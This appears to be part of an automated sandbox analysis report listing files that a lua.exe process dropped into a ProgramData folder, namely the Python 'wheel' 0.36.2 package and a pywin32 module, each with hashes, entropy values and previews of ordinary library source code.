Preview:	"wheel" copyright (c) 2012-2014 Daniel Holth <dholth@fastmail.fm> and.contributors...The MIT License..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRA

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2277
Entropy (8bit):	5.122240183689081
Encrypted:	false
SSDEEP:	48:DEg03Cnd+p8d+zztjaaxLiPk1CliwqrwOT8RfkD1UKd+mOl1Awr+:DE7yQPzztjaaxmPko0lrfOfsUzmbY+
MD5:	8F630AAA4CE76C546F37B0DEB6EE7962
SHA1:	B4283F2280F8479F5BEAE36E8D2A486BAAE391A9
SHA-256:	C3DEA9017307656CC5CBE770A8666A5DBC6EE47BA9DDC6F7387BA3842B967C3B
SHA-512:	770C736EAF75414E260C9D84AAA8AD3229E621EB9728776FC2FCEE9D12696AE6B1FF94C86E6D56A411F1A7BC69D655D9F9452289660289DCA77F88D1C6C231AB
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: wheel.Version: 0.36.2.Summary: A built-package format for Python.Home-page: https://github.com/pypa/wheel.Author: Daniel Holth.Author-email: dholth@fastmail.fm.Maintainer: Alex Gr.nholm.Maintainer-email: alex.gronholm@nextday.fi.License: MIT.Project-URL: Documentation, https://wheel.readthedocs.io/.Project-URL: Changelog, https://wheel.readthedocs.io/en/stable/news.html.Project-URL: Issue Tracker, https://github.com/pypa/wheel/issues.Keywords: wheel,packaging.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python ::

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2804
Entropy (8bit):	5.745182144155119
Encrypted:	false
SSDEEP:	48:sBnuX/ayYzqGn85JGgWMLflJp8O+KprpITQgFvSyXH6jHL18myeyNVNkG9+mvinr:sEXVBGuUgp8t4r2TQyvSyXH6jH58/NVE
MD5:	8388842A2A40EB2B641E1333BAEDC467
SHA1:	F9A709CAC2AB2412B7F3594F9C73413B0B85F620
SHA-256:	53553E5CAEC403FA096E5C2E252DCAA86B52F5828307580DCEC8D42779313751
SHA-512:	FA272B4B9ACA3E5C8519EC024E3F4860E96C9D54DA57623AFEB1C16DB7E2527228FC06C36E1F13885C99C82C12A910CEA9E109E530B1371AEE1F03B8AA13F88C
Malicious:	false
Preview:	../../Scripts/wheel.exe,sha256=mAG_X5ZFdMxtFQaHaBJmvSphoLZwAH60mnxeP-DST7E,97117..wheel-0.36.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.36.2.dist-info/LICENSE.txt,sha256=zKniDGrx_Pv2lAjzd3aShsvuvN7TNhAMm0o_NfvmNeQ,1125..wheel-0.36.2.dist-info/METADATA,sha256=w96pAXMHZWzFy-dwqGZqXbxu5Hup3cb3OHujhCuWfDs,2277..wheel-0.36.2.dist-info/RECORD,,..wheel-0.36.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.36.2.dist-info/WHEEL,sha256=Z-nyYpwrcSqxfdux5Mbn_DQ525iP7J2DG3JgGvOYyTQ,110..wheel-0.36.2.dist-info/entry_points.txt,sha256=N8HbYFST3yrNQYeB2wXWBEPUhFsEtKNRPaCFGJPyqyc,108..wheel-0.36.2.dist-info/top_level.txt,sha256=HxSBIbgEstMPe4eFawhA66Mq-QYHMopXVoAncfjb_1c,6..wheel/__init__.py,sha256=gEack6q3vgbmrgen7cO3fCOv6vFF4hh2KYyj3fKk54I,23..wheel/__main__.py,sha256=lF-YLO4hdQmoWuh4eWZd8YL1U95RSdm76sNLBXa0vjE,417..wheel/__pycache__/__init__.cpython-37.pyc,,..wheel/__pycache__/__main__.cpython-37.pyc,,..wheel/__pycache__/bdi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViHoKKjP+tPCCf7irO5S:RtBMwlViQWBBwt
MD5:	5BBA2AABC4A5D75E954C7EDF9834DE0A
SHA1:	407755EDC93510D5F7556ECDD1E7CB42F9357D8F
SHA-256:	67E9F2629C2B712AB17DDBB1E4C6E7FC3439DB988FEC9D831B72601AF398C934
SHA-512:	803B1181918FB2D93D2D2715D96E087E9333647C4A4A405D4FAD9DEDE0B77C8E3BCD5CAC7F3A426C60715202E2ECEBCD3EE9E066B2233A814A9A821D23BE88D0
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\entry_points.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.342039869160156
Encrypted:	false
SSDEEP:	3:1SSAsVYgh+MWTMhk6WjwVM5t5ln:1rb9WTMhk9jSM5t5ln
MD5:	7AB099DD08D127FFF9A98B12A6B127E0
SHA1:	8454C246D5A924CC6A13F5BFA188468E00F4D179
SHA-256:	37C1DB605493DF2ACD418781DB05D60443D4845B04B4A3513DA0851893F2AB27
SHA-512:	866EAFE67528CE8B692F474E7883BF776644CD41D13220D9C7F9446F7E325104C2F4ABF9B08701E470423756511D452885DFA1B875D4661D3472BC2002C28492
Malicious:	false
Preview:	[console_scripts].wheel = wheel.cli:main..[distutils.commands].bdist_wheel = wheel.bdist_wheel:bdist_wheel..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:/sv:/sv
MD5:	EF72659542687B41FB1A4225120F41FA
SHA1:	3EF6EE742B2E851DEA1F754CE60A1FC222194799
SHA-256:	1F148121B804B2D30F7B87856B0840EBA32AF90607328A5756802771F8DBFF57
SHA-512:	A16A6E11367C986B2A7B38C491943B28F402081D3E2D41474C9E61BE44941133E87CB821750AD27A1E46FA2AFF9F93B8584C37247BDE219ABAC12D3D6EE4477C
Malicious:	false
Preview:	wheel.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.9148663038831004
Encrypted:	false
SSDEEP:	3:cvYiHXs:8YiHXs
MD5:	C2340F7278B73A5752A6A2D3ED0B5F03
SHA1:	BE98152CB2E2D2A4AF02A2C6DFA16ED554F0592F
SHA-256:	80469C93AAB7BE06E6AE07A7EDC3B77C23AFEAF145E21876298CA3DDF2A4E782
SHA-512:	FE5D2BDDE8E349E98F4985FF6E27AB6CC38F34CCDD670EB40E95B0FDE103C1EF8243EC2A4ACCDEAFF42BC8C1B680C07DE8C0622C152CE9A16CDB735AF0ED4461
Malicious:	false
Preview:	__version__ = '0.36.2'.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\__main__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	417
Entropy (8bit):	4.593644942245126
Encrypted:	false
SSDEEP:	12:KlbJ2NGHy86IiEE8fTo2gMzk+h3s2pIzv:mxHp6IiE02xh3hpwv
MD5:	3676F24A2606DFB766DF390477ED4054
SHA1:	82ECEC85E22F97AFCC3FCCE933C54CC72966F637
SHA-256:	945F982CEE217509A85AE87879665DF182F553DE5149D9BBEAC34B0576B4BE31
SHA-512:	D102A87CE3DB5914F18C3DAC1091CA39AAEC3F022F7CA023EEDE2AF8EC4BA4713980B77286EB15350E4697CF08544BE3093F8C64CE09A17C8494460934B08494
Malicious:	false
Preview:	""".Wheel command line tool (enable python -m wheel syntax)."""..import sys...def main(): # needed for console script. if __package__ == '':. # To be able to run 'python wheel-0.9.whl/wheel':. import os.path. path = os.path.dirname(os.path.dirname(__file__)). sys.path[0:0] = [path]. import wheel.cli. sys.exit(wheel.cli.main())...if __name__ == "__main__":. sys.exit(main()).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\bdist_wheel.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19075
Entropy (8bit):	4.449992482503777
Encrypted:	false
SSDEEP:	384:UQLQK5leDUE6p915OEj+B731iHJ5rsp+Eo8KJg+rnBB:UQQK5leDUXT+B7lqUy8Eg6nBB
MD5:	8A32774152F6450368FC05C93ABFACC6
SHA1:	B083EAEDE96E0813A99D587BD13A75927FD60E3C
SHA-256:	DAF7EFDE0FDBF01BD9E43A3D6E92C405DBBD75011CBE8310D5F957A4A6052435
SHA-512:	A4FFEF00A3CE353151E8462745D07E7A22F2C79023476C9BC4DAB20ABA4EE9F80F682D7AAA23F76F353850C8CA043890BC025D440A1DF75136C20EC3E169BE68
Malicious:	false
Preview:	""".Create a wheel (.whl) distribution...A wheel is a built archive format.."""..import distutils.import os.import shutil.import stat.import sys.import re.import warnings.from collections import OrderedDict.from distutils.core import Command.from distutils import log as logger.from io import BytesIO.from glob import iglob.from shutil import rmtree.from sysconfig import get_config_var.from zipfile import ZIP_DEFLATED, ZIP_STORED..import pkg_resources..from .pkginfo import write_pkg_info.from .macosx_libfile import calculate_macosx_platform_tag.from .metadata import pkginfo_to_metadata.from .vendored.packaging import tags.from .wheelfile import WheelFile.from . import __version__ as wheel_version..if sys.version_info < (3,):. from email.generator import Generator as BytesGenerator.else:. from email.generator import BytesGenerator..safe_name = pkg_resources.safe_name.safe_version = pkg_resources.safe_version..PY_LIMITED_API_PATTERN = r'cp3\d'...def python_tag():. return 'py{}'.fo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\cli\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2572
Entropy (8bit):	4.6390882556133555
Encrypted:	false
SSDEEP:	48:i+WpCeAEmmqxL4s5vDl+WdLjbCWEzLMQLSUwAdn:m8U+tvB+WdnbCWK4Qdn
MD5:	61CA7308E0B82DFE54D728E549409F8F
SHA1:	AD4BF425AD230A5E1F066C3E242427AB78A409C5
SHA-256:	1964A8194A5169B4DFF1B93716C3533EB73916CAFC60EBF6757E79898D96EDE6
SHA-512:	C55D6FD9D67FF693C30F79A098BD144994C9FDA28FB23131F4218AA52D1BAD703BB9904F03F3866A1C9A77C7D4044ECA8C422E80C6F38AA39AB249C6EF4EC562
Malicious:	false
Preview:	""".Wheel command-line utility.."""..from __future__ import print_function..import argparse.import os.import sys...def require_pkgresources(name):. try:. import pkg_resources # noqa: F401. except ImportError:. raise RuntimeError("'{0}' needs pkg_resources (part of setuptools).".format(name))...class WheelError(Exception):. pass...def unpack_f(args):. from .unpack import unpack. unpack(args.wheelfile, args.dest)...def pack_f(args):. from .pack import pack. pack(args.directory, args.dest_dir, args.build_number)...def convert_f(args):. from .convert import convert. convert(args.files, args.dest_dir, args.verbose)...def version_f(args):. from .. import __version__. print("wheel %s" % __version__)...def parser():. p = argparse.ArgumentParser(). s = p.add_subparsers(help="commands").. unpack_parser = s.add_parser('unpack', help='Unpack wheel'). unpack_parser.add_argument('--dest', '-d', help='Destination directory',.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\cli\convert.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9498
Entropy (8bit):	4.559515415435157
Encrypted:	false
SSDEEP:	192:8D1onoRjUSSMQ+wxabh1pr1Axp12H0+AwTtZ77:8JLRSMQ+BRrSKHuq97
MD5:	8058CD61079600BC3AD259FA26CED2E8
SHA1:	AEE8A627CD3300A23F1C03C654A36320A4ACD712
SHA-256:	EC5E2F8F6DC0D8E8210C35A7F605F657EFD37973336B56B99C87A39851845093
SHA-512:	A300CFD4B61A82320010B5BE48AAB2C1D308CBC9A6A824519E634523778ABD428F3986ADB595200C200CCD6F3F82F8566F45956C9838FD87658B271E355A75BF
Malicious:	false
Preview:	import os.path.import re.import shutil.import sys.import tempfile.import zipfile.from distutils import dist.from glob import iglob..from ..bdist_wheel import bdist_wheel.from ..wheelfile import WheelFile.from . import WheelError, require_pkgresources..egg_info_re = re.compile(r'''. (?P<name>.+?)-(?P<ver>.+?). (-(?P<pyver>py\d\.\d+). (-(?P<arch>.+?))?. )?.egg$''', re.VERBOSE)...class _bdist_wheel_tag(bdist_wheel):. # allow the client to override the default generated wheel tag. # The default bdist_wheel implementation uses python and abi tags. # of the running python process. This is not suitable for. # generating/repackaging prebuild binaries... full_tag_supplied = False. full_tag = None # None or a (pytag, soabitag, plattag) triple.. def get_tag(self):. if self.full_tag_supplied and self.full_tag is not None:. return self.full_tag. else:. return bdist_wheel.get_tag(self)...def egg2wheel(egg_path, dest_dir):. fil

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\cli\pack.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3208
Entropy (8bit):	4.757420525034607
Encrypted:	false
SSDEEP:	96:EF6WSfURgQwB+NIXF1Elq8R8ujHqE1VtyTIRO:EgWp+QJk1ElT1tyTIRO
MD5:	67BA28165400D5B8C829D1B78989DE45
SHA1:	ACC9D900FB7DAB9D1DBDDF32C2AA2DF6603080E7
SHA-256:	4BE275888CB518F0D34C3767FBF4B0C466BB37BDBD878899348D75103142A9F0
SHA-512:	01E8AB366D389E0C79D4ACE4A4B0AA0F4220CA6AA12F6862A3EE08E32DE2DCA9E26732881FA9FD58C22EE067D952EA4D79EB2D779E704D765654847EEF04E174
Malicious:	false
Preview:	from __future__ import print_function..import os.path.import re.import sys..from wheel.cli import WheelError.from wheel.wheelfile import WheelFile..DIST_INFO_RE = re.compile(r"^(?P<namever>(?P<name>.+?)-(?P<ver>\d.?))\.dist-info$").BUILD_NUM_RE = re.compile(br'Build: (\d\w)$')...def pack(directory, dest_dir, build_number):. """Repack a previously unpacked wheel directory into a new wheel file... The .dist-info/WHEEL file must contain one or more tags so that the target. wheel file name can be determined... :param directory: The unpacked wheel directory. :param dest_dir: Destination directory (defaults to the current directory). """. # Find the .dist-info directory. dist_info_dirs = [fn for fn in os.listdir(directory). if os.path.isdir(os.path.join(directory, fn)) and DIST_INFO_RE.match(fn)]. if len(dist_info_dirs) > 1:. raise WheelError('Multiple .dist-info directories found in {}'.format(directory)). elif not dist_info_dirs:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\cli\unpack.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	673
Entropy (8bit):	4.623674288370941
Encrypted:	false
SSDEEP:	12:1RjPZTKyNZDw5d7hxXylsgoODrtl1eqXaSU/oDvtkuZOvYFQAFFce:1RcwCd7hxXTg/ftf/XEWXZOvY2AFFce
MD5:	ED26FD85DA61435ED84E34BC45F77470
SHA1:	42F2FFA49D8D34D2DA6A1B490890F8F394C08436
SHA-256:	D155B34FB53FC727A74CFC0455ABF1AAF75E7BDDC63EF0051E747752EF756917
SHA-512:	46082397B1848AAEB83577C64416022BDEA49C14E0C29D17A745E20C65C87DB219C7FFFE9198EEC8079798DC6A91FE769E44B9471477A30A07163312387AC0B7
Malicious:	false
Preview:	from __future__ import print_function..import os.path.import sys..from ..wheelfile import WheelFile...def unpack(path, dest='.'):. """Unpack a wheel... Wheel content will be unpacked to {dest}/{name}-{ver}, where {name}. is the package name and {ver} its version... :param path: The path to the wheel.. :param dest: Destination directory (default to current directory).. """. with WheelFile(path) as wf:. namever = wf.parsed_filename.group('namever'). destination = os.path.join(dest, namever). print("Unpacking to: {}...".format(destination), end=''). sys.stdout.flush(). wf.extractall(destination).. print('OK').

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\macosx_libfile.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15931
Entropy (8bit):	4.8771915855977745
Encrypted:	false
SSDEEP:	384:zMkfViwqbGaxERa5V3YwBTAgH9hZf4KHFGYGrx:IeadxERa5V3YwBTN9hp4KHFGYGrx
MD5:	FED1681DD9488CF8553C3273FCB374F1
SHA1:	7685F657B37EF197281C28962E5813F787E21E9B
SHA-256:	EEF11C1A5976DCADDF88B8EDB47D229ED8F14743482BC3BABE29A3459EC10A87
SHA-512:	63715632A1529687A773435DBDE2B9BD76111BEF1AB4A0EDB2AE99CEB97C60D05F3A530C03602D1D0236B21B55AC8B4A8AE32931B414E669433F98104C71BFB7
Malicious:	false
Preview:	""".This module contains function to analyse dynamic library.headers to extract system information..Currently only for MacOSX..Library file on macosx system starts with Mach-O or Fat field..This can be distinguish by first 32 bites and it is called magic number..Proper value of magic number is with suffix _MAGIC. Suffix _CIGAM means.reversed bytes order..Both fields can occur in two types: 32 and 64 bytes...FAT field inform that this library contains few version of library.(typically for different types version). It contains.information where Mach-O headers starts...Each section started with Mach-O header contains one library.(So if file starts with this field it contains only one version)...After filed Mach-O there are section fields..Each of them starts with two fields:.cmd - magic number for this command.cmdsize - total size occupied by this section information...In this case only sections LC_VERSION_MIN_MACOSX (for macosx 10.13 and earlier).and LC_BUILD_VERSION (for macosx 10.14 an

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\metadata.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4344
Entropy (8bit):	4.542573351743192
Encrypted:	false
SSDEEP:	96:NNwTWa2v++EzqH+NL7FPnMzMn0VgjhgM8vG0vBT29:2Wa2G+E+H+rPnMzM0yjhgl5JT29
MD5:	6797003E625CA4EA70D693CB3B1156DD
SHA1:	B0D56A67D1E58B2EB3F0EF2A298F26815F5A1404
SHA-256:	6F790F8599F6C360FDC1E9E096D5F99C621943711150E43953E2B9BC728F75E8
SHA-512:	25A10A7B8DC19D0C74C233690D1F30DB7549CFAAA50D0AFE0A5949A86A2CD3D5FFF12B9DFFE1BC77A9D2829C889ABDBAD51A0EB021B2325F00D150575C8F6F16
Malicious:	false
Preview:	""".Tools for converting old- to new-style metadata.."""..import os.path.import textwrap..import pkg_resources..from .pkginfo import read_pkg_info...def requires_to_requires_dist(requirement):. """Return the version specifier for a requirement in PEP 345/566 fashion.""". if getattr(requirement, 'url', None):. return " @ " + requirement.url.. requires_dist = []. for op, ver in requirement.specs:. requires_dist.append(op + ver). if not requires_dist:. return ''. return " (%s)" % ','.join(sorted(requires_dist))...def convert_requirements(requirements):. """Yield Requires-Dist: strings for parsed requirements strings.""". for req in requirements:. parsed_requirement = pkg_resources.Requirement.parse(req). spec = requires_to_requires_dist(parsed_requirement). extras = ",".join(sorted(parsed_requirement.extras)). if extras:. extras = "[%s]" % extras. yield (parsed_requirement.project_name + extras + sp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\pkginfo.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1257
Entropy (8bit):	4.472987506321427
Encrypted:	false
SSDEEP:	24:vl5eGLhTOXvcLlhYGW5hEBNwIO1HhduX6NjIohgNwIOpH024:vlEGFTcClW3kglZb0gpb4
MD5:	7AD63685FF9845C7DFF88A834B094B5C
SHA1:	58990D01C6A8BB343FCD6843C80628364C599B6C
SHA-256:	191EFA92EA50CE7D71F6C283697B84E81E85B19E0E91F46D1BBA677655CFBD0E
SHA-512:	003D4390FBE6B20695F4559525DCD3606AC2948FFA69BA9254AF418B782683648516DFCB8765B76CC93C28D7E716D91825FC4A5CFEB3D0A9F40020BAA92CC457
Malicious:	false
Preview:	"""Tools for reading and writing PKG-INFO / METADATA without caring.about the encoding."""..from email.parser import Parser..try:. unicode. _PY3 = False.except NameError:. _PY3 = True..if not _PY3:. from email.generator import Generator.. def read_pkg_info_bytes(bytestr):. return Parser().parsestr(bytestr).. def read_pkg_info(path):. with open(path, "r") as headers:. message = Parser().parse(headers). return message.. def write_pkg_info(path, message):. with open(path, 'w') as metadata:. Generator(metadata, mangle_from_=False, maxheaderlen=0).flatten(message).else:. from email.generator import BytesGenerator.. def read_pkg_info_bytes(bytestr):. headers = bytestr.decode(encoding="ascii", errors="surrogateescape"). message = Parser().parsestr(headers). return message.. def read_pkg_info(path):. with open(path, "r",. encoding="ascii",. errors="surro

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	938
Entropy (8bit):	4.627919387593039
Encrypted:	false
SSDEEP:	24:iKCsXxPOkqimBsp+kbs+oEp6k7yssSCOqeN:JCsdOgsY4rpSCOqeN
MD5:	1FBA0F56031F3B4B24F808285EF76658
SHA1:	3D368F500FAE11E60CF6E50E4B86732613C6C004
SHA-256:	9A73599090A2F431CB23FAB8953B9DA03D265BDEE1FC0A005A5EE9ACD3CB5C97
SHA-512:	85638041CFF5B735239515FEB06236B95852A0B28AF283A79C14F49D1F0383524F0A44DB86211D30534BEFD37449715653B7BB50AE9671536A6AB285DC0C437F
Malicious:	false
Preview:	import base64.import io.import sys...if sys.version_info[0] < 3:. text_type = unicode # noqa: F821.. StringIO = io.BytesIO.. def native(s, encoding='utf-8'):. if isinstance(s, unicode): # noqa: F821. return s.encode(encoding). return s.else:. text_type = str.. StringIO = io.StringIO.. def native(s, encoding='utf-8'):. if isinstance(s, bytes):. return s.decode(encoding). return s...def urlsafe_b64encode(data):. """urlsafe_b64encode without padding""". return base64.urlsafe_b64encode(data).rstrip(b'=')...def urlsafe_b64decode(data):. """urlsafe_b64decode without padding""". pad = b'=' * (4 - (len(data) & 3)). return base64.urlsafe_b64decode(data + pad)...def as_unicode(s):. if isinstance(s, bytes):. return s.decode('utf-8'). return s...def as_bytes(s):. if isinstance(s, text_type):. return s.encode('utf-8'). return s.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\vendored\packaging\_typing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	4.751869054200876
Encrypted:	false
SSDEEP:	48:xWbqWeWBqxBXoYxtKwXF8opwKjtuvMiqF:y3cr4KkOpgi
MD5:	B0DAC8EF6953FB835C7D633E6A427BA7
SHA1:	F521B39E0501E178412D557AC85D625626B85326
SHA-256:	C79F44850E7B4CC4FE9134722D9576E4766F6061B06EE713A3A88A87F3B4B4CC
SHA-512:	DE5D2189075A26DC2E9BA41C1BBF2D4CCD3D5FB475802A0D7A70E311A301C4C4CB619D9F15C6263A420583B4F8BF87FCD589D6F96FE7B1EDC367B875D54CFDDA
Malicious:	false
Preview:	"""For neatly implementing static typing in packaging...`mypy` - the static type analysis tool we use - uses the `typing` module, which.provides core functionality fundamental to mypy's functioning...Generally, `typing` would be imported at runtime and used in that fashion -.it acts as a no-op at runtime and does not have any run-time overhead by.design...As it turns out, `typing` is not vendorable - it uses separate sources for.Python 2/Python 3. Thus, this codebase can not expect it to be present..To work around this, mypy allows the typing import to be behind a False-y.optional to prevent it from running at runtime and type-comments can be used.to remove the need for the types to be accessible directly during runtime...This module provides the False-y guard in a nicely named fashion so that a.curious maintainer can reach here to read this...In packaging, all static-typing related imports should be guarded as follows:.. from packaging._typing import TYPE_CHECKING.. if TYPE_CHEC

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\vendored\packaging\tags.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	28937
Entropy (8bit):	4.798362887190139
Encrypted:	false
SSDEEP:	768:id+2LXmOvtnE/okOEl2hx1plf3BoQ3D6Xlp+zeVzegzetNBEq1KW0fbvOkOuL546:idVSUE/okOEl2D1plPBoQ3D6Xlp+zeVD
MD5:	C97E817A9237743131B2DD2931825CE0
SHA1:	725857FE44CA4DD40C23D58EBA5185CE75B58E6B
SHA-256:	CBC86016A7D5D0AAE2A3E1DE80F0770F4A7F01E898704F17C0094476612B0DED
SHA-512:	6704159CF937E42E0A406ABBC06F2CFF76C3FC096AB5FDB7C44E9FCD37B7D4A73EEA063B309A407C0AE15C776E8C82738272761EC41FC38D23FF3F73E452DCDA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import..import distutils.util..try:. from importlib.machinery import EXTENSION_SUFFIXES.except ImportError: # pragma: no cover. import imp.. EXTENSION_SUFFIXES = [x[0] for x in imp.get_suffixes()]. del imp.import collections.import logging.import os.import platform.import re.import struct.import sys.import sysconfig.import warnings..from ._typing import TYPE_CHECKING, cast..if TYPE_CHECKING: # pragma: no cover. from typing import (. Dict,. FrozenSet,. IO,. Iterable,. Iterator,. List,. Optional,. Sequence,. Tuple,. Union,. ).. PythonVersion = Sequence[int]. MacVersion = Tuple[int, int]. GlibcVersion = Tuple[int, int]...logger = logging.getLogger(__name__)..INTERPRETER_SHORT_NAMES

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel\wheelfile.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7336
Entropy (8bit):	4.490682078781122
Encrypted:	false
SSDEEP:	96:+V55Rcv+Y++dqB2qjePon8ZrxFAtnut3Q/u3wJHZmYxbbLZvZmg3SFIigOsbbC9p:+HcRVjNOK393iZqg3SKI9p
MD5:	63D5579F01DF95CEF6B891FB0DD688DA
SHA1:	549EF8A51F664D4221DC7AEB209092863DB8CF59
SHA-256:	ECA80E2B5CE7AE8F83F007A580D104E2383A7C361763F06EE9CADDA8B6F61104
SHA-512:	C49C4899D7713AFE523AFC9C2BC1BC33B29FF8958192006D363B9EBE8F535FFB7D05BEE99E90998D365E8AF130CCF03E6B8AD0F03F12A375F173E5C5C8D0659D
Malicious:	false
Preview:	from __future__ import print_function..import csv.import hashlib.import os.path.import re.import stat.import time.from collections import OrderedDict.from distutils import log as logger.from zipfile import ZIP_DEFLATED, ZipInfo, ZipFile..from wheel.cli import WheelError.from wheel.util import urlsafe_b64decode, as_unicode, native, urlsafe_b64encode, as_bytes, StringIO..# Non-greedy matching of an optional build number may be too clever (more.# invalid wheel filenames will match). Separate regex for .dist-info?.WHEEL_INFO_RE = re.compile(. r"""^(?P<namever>(?P<name>.+?)-(?P<ver>.+?))(-(?P<build>\d[^-]*))?. -(?P<pyver>.+?)-(?P<abi>.+?)-(?P<plat>.+?)\.whl$""",. re.VERBOSE)...def get_zipinfo_datetime(timestamp=None):. # Some applications need reproducible .whl files, but they can't do this without forcing. # the timestamp of the individual ZipInfo objects. See issue #143.. timestamp = int(os.environ.get('SOURCE_DATE_EPOCH', timestamp or time.time())). return time.gmti

C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3323
Entropy (8bit):	5.101473434767897
Encrypted:	false
SSDEEP:	96:iQnQGME0sKV8SoScItAnAjn+K8pvkaluJ9fGkWGmGn:BnQGp0getQAjnQlY9ekXmGn
MD5:	EA7062B33FFAD3D32591E9C9144D14F2
SHA1:	9C87A21C58C505B569E21B249B6C64FCA946059F
SHA-256:	199D07151AD95F088D6A62B641082DE7EF8316311460D0618E86690523560B3E
SHA-512:	DDF8433291B37DA2A8920E9104E213CC91A2BF5E411A7A089FE940F9FBFE90BBFBBADFD90D92A99143C0D8E18095F23C6341F47EB82A0579E96625866D8DAE52
Malicious:	false
Preview:	import win32com.import win32com.client..if type(__path__)==type(''):..# For freeze to work!..import sys..try:...import adsi...sys.modules['win32com.adsi.adsi'] = adsi..except ImportError:...pass.else:..# See if we have a special directory for the binaries (for developers)..win32com.__PackageSupportBuildPath__(__path__)...# Some helpers.# We want to _look_ like the ADSI module, but provide some additional.# helpers...# Of specific note - most of the interfaces supported by ADSI.# derive from IDispatch - thus, you get the custome methods from the.# interface, as well as via IDispatch..import pythoncom.from .adsi import *..LCID = 0..IDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch].IADsContainerType = pythoncom.TypeIIDs[adsi.IID_IADsContainer]..def _get_good_ret(ob,..... # Named arguments used internally..... resultCLSID = None):..assert resultCLSID is None, "Now have type info for 